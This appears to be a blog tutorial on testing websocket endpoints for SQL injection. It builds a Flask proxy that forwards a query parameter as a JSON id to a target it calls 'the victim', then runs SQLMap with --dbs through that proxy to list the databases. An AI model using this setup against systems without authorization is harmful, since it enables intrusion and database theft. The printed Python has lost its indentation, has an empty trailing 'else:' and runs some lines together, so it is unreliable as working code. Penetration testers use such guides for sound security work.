SQLMap over websockets
--
SQLMap is a powerful open-source tool that is widely used for detecting and exploiting SQL injection vulnerabilities in web applications. It simplifies the process of identifying SQLi vulnerabilities, determining the type of database, and extracting sensitive information from the database.
However, there are some limitations to SQLMap. For instance, it may not support certain types of requests, such as those made over websockets. Additionally, working with complex targets can be challenging using SQLMap alone.
In this article, we will explore a possible solution to these issues that requires minimal effort and makes also simpler to work with SQLMap.
The idea
To simplify the process the idea is to set up a fake server as an intermediary. With this approach, SQLMap would make a request to the fake server using a common format, and the fake server would then make the more complex request to the actual target.
In this way, SQLMap can be used to test the fake server, which serves as a proxy for the real target. This method can be particularly useful when dealing with complex targets or requests that are not supported by SQLMap.
Prepare the environment
To set up the server, we will be using Python along with the Flask and Websocket libraries. To get started, we will create a virtual environment and install the necessary packages using pip.
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install flask websocketOnce the installation is complete, the server can be launched using a simple command. It will be available on localhost by default over the port 5000.
flask runThe main server
To set up the server, all we need to do is define an endpoint that should take one or more query parameters as input and use them to create the request.
from flask import Flask, request
from websocket import create_connection
app = Flask(__name__)
ws_url = "ws://website.com" # put here the ws base url
# it expects a request like /?query=something
@app.route("/")
def handle():
# query is the query param name used by this endpoint
args = request.args
id = args.get('query')
ws = create_connection(ws_url)
# in this example, the websocket endpoint
# expects a json with an id parameter
# that is vulnerable to sqli
payload = '{"id":"%s"}' % id
ws.send(payload)
res = ws.recv()
ws.close()
if res:
return res
else:In this code, the victim is expected to receive a websocket message containing a JSON object with an ID. The server intercepts the SQLMap request, extracts the ID passed as query, and sent it on to the actual target. This allows SQLMap to be used to test the fake server, which serves as a proxy for the real target.
It is important to note that the server must be running before SQLMap can be executed. Also, be careful to call this file as “app.py” to make it recognizable by flask. Otherwise, you should change the value of the FLASK_APP environment variable.
Run SQLMap
To run SQLMap, you simply need to provide the correct URL that includes the query parameter(s) and SQLMap will take care of the rest.
Once SQLMap is executed, it will be able to scan the victim by going through the fake server that we created.
sqlmap -u "http://localhost:5000/?query=1" --batch --dbsSummary
For your convenience, I leave here a Gist that summarizes the key points of this article.
